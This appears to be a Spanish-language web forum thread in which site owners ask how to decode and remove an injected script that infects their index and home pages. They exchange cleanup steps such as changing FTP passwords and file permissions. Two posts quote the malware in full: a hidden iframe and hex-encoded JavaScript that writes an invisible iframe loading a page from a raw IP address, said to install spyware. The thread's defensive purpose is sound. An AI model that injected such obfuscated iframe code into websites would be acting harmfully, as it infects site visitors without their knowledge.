Javascript desencriptar - Detectar de donde es el virus!

Hola buenas,

Como podria desencriptar el siguiente codigo para obtener la url principal y realizar una denuncia por el spywar que instala en la pc y afecta a todos los sitios que esta en el ftp colocando ese codigo en los archivos: index.html, index.php, home.php, home.html

Espero su ayuda de ustedes desde ya muchas gracias.
este es el codigo:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475ba98be72f5(v475ba98be7703){ function v475ba98be7b00 () {return 16;} return(parseInt(v475ba98be7703,v475ba98be7b00())); }function v475ba98be8301(v475ba98be86f6){ var v475ba98be8af1='';for(v475ba98be8f02=0; v475ba98be8f02<v475ba98be86f6.length; v475ba98be8f02+=2){ v475ba98be8af1+=(String.fromCharCode(v475ba98be72f 5(v475ba98be86f6.substr(v475ba98be8f02, 2))));}return v475ba98be8af1;} document.write(v475ba98be8301('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D616 630306263363962643161207372633D5C27687474703A2F2F3 7372E3232312E3133332E3138382F2E69662F676F2E68746D6 C3F272B4D6174682E726F756E64284D6174682E72616E646F6 D28292A323736323736292B2730663162353731623135665C2 72077696474683D343632206865696768743D3539382073747 96C653D5C27646973706C61793A206E6F6E655C273E3C2F696 672616D653E27293C2F5343524950543E'));</script>


Saludos,

Saludos a todos si efectivamente es un Virus / Troyano que adjunta este codigo a todos los archivos index, default y home con extenciones htm, html, PHP, ASP en algunos casos se coloca en el <HEAD> o justo depues de la eiqueta <BODY> y en los archivos PHP justo alfinal de la etiquta "?>"

este es el ingenioso scrip
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function v1147600cb1140e6(v1147600cb114cc9){ return(parseInt(v1147600cb114cc9,16));}
function v1147600cb1173da(v1147600cb117ba8){ var v47600cb11837c='';
for(v1147600cb1191b3=0; v1147600cb1191b3<v1147600cb117ba8.length; v1147600cb1191b3+=2){ v1147600cb11837c+=(String.fromCharCode(v1147600cb1 140e6(v1147600cb117ba8.substr(v1147600cb1191b3, 2))));}
return v47600cb11837c;}
document.write(v1147600cb1173da('3C5343524950543E7 7696E646F772E7374617475733D27446F6E65273B646F63756 D656E742E777269746528273C696672616D65206E616D653D3 033393264207372633D5C27687474703A2F2F37372E3232312 E3133332E3138382F2E69662F676F2E68746D6C3F272B4D617 4682E726F756E64284D6174682E72616E646F6D28292A31353 5353834292B2731353761343161383663655C2720776964746 83D373034206865696768743D323231207374796C653D5C276 46973706C61793A206E6F6E655C273E3C2F696672616D653E2 7293C2F5343524950543E'));
</script>

Al parecer es de origen RUSO y los ataques aparentemente biene de todo aquel que tenga acceso al sitio o este infectado los ataques tabien son remotos en intervalos de 4 a 8 hrs. Este virus se propaga mediante bug (error deprogramacion) del Internet Explorer para ejecutar un archivo ejecutable (EXE) e instalarse en la Pc´s. Que raro que tenga bug´s el IE.

En un segundo foro tiene parte de la solucion gracias "Panino5001"

Las recomendaciones son la sigueintes:
1.- Checar que su PC y su red de que No esten infectados. Recomiendo usar (hijackthis, AD-Aware AVG-Antivirus)
2.- Cambiar atributos de los archivos de los archivos index, home y default de 777 a 644 mediante chmod.
3.- Cambiar usuarios y passwords de Cpanel y FTP.
4.- Checar todas las carpetas en busca de archivos index, home y default que esten infectados ejemplo:
www/index.html
www/folder1/index.html
www/fodler2/index.html
www/.../index.html

Otra recomendacion es reportarlo a su Host manager y usar un buen antivirus para eliminarlo.
Tabien usar Firefox pues no ejecuta este scrip malicioso, "Dios bendiga al Firefox".
mas informacion sobre el tema y del virus en:

http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=HTML%5FIFRAME%2ECX&VSect=P

http://forums.digitalpoint.com/showthread.php?t=596009

Fijate aquí:
http://forums.digitalpoint.com/showthread.php?t=596009

Hola yo tngo el mismo problema pero lo soluciono bajando me la web del ftp y buscando en dreamweaver por carpeta ppongo esto <iframe src='http://url' width='1' height='1' y me salen 14 archivos con esto. Mi pregunta es sabe alguien como hacer que esto no vuelva a entrar por ke ya lko hice2 veces pero alcabo de unos dias me entra otra vez


graciass

TENGO EL MISMO PROBLEMA pero en todos los sitios que tengo en el FTP solo DOS (mis dos principales www.tamararebonita.com y www.tamararebonita.com.ar estas infectados) los borre y por ahora nada pero... de donde pueden venir?

Hgan lo que se les dijo mas arriba:

1.- Checar que su PC o su red de que No esten infectados.
2.- Cambiar atributos de los archivos de los archivos index de 777 a 644 mediante chmod.
3.- Cambiar usuarios y passwords de Cpanel y FTP.
4.- Checar todas las carpetas en busca de archivos index que esten infectados ejemplo:
www/index.html
www/folder1/index.html
www/fodler2/index.html
www/.../index.html

Para que se aclaren comn esto de los permisos 644 : http://www.wikilearning.com/tutorial...rmisos/6515-28

Saludos, y si seguimos esos pasos, sobre todo de los permisos no tendria por que modificarnos los archivos en el servidor, por supuesto los que usen apache.

Dándome una vuelta en los foros me encuentro con esto que ya conocía por que a un amigo del trabajo le paso exactamente lo mismo, vere si puedo preguntarle como lo soluciono...pero por lo pronto:

- La infeccion podría estar en tu pc, algún programa que cambia los archivos .php, .htm, .html,... Pero para esto podrías verificar otros sitios registrados en este dominio a ver si arrojan el mismo problema. Si tienen el mismo problema, entonces puede ser que tu dominio(si no es pago), este colocando anuncios de publicidad a todas las paginas de este tipo(Solo que debe tener alguna linea que el antivirus identifica como maliciosa en su BD).

1. Buscarte un editor o convertidor hexadecimal, es probable que la conversión de esos caracteres extraños te indique algo o te suministre informacion importante.

2. El antivirus es probable que te de mas información sobre de que tipo de virus se trata y lo buscas por su nombre en google.

3. Verifica si tu proveedor de servicio te permite cambiar el privilegio de archivos con chmod si esta en 777 pasalo a 644 con esto impides la edición en el servidor por parte de algún script en esa máquina(Aunque dudo mucho que el problema este en el servidor-o deberias informarlo y le pasa el problema a ellos).

4. Después del paso 3, baja tus archivos en otra máquina que no este infectada o la arrancas desde un cd-live o usb(Para esto existe win32 y linux-portables)

5. Una vez cumplido el paso 3, baja tus archivos y (puede ser con gvim-gratuito y eficiente) editas todos tus archivos y borras el script. Retornas todo al servidor y debería funcionar de forma permanente.

El mensaje original es de hace más de 1 año. Por favor, no reviváis temas tan antiguos.

Saludos,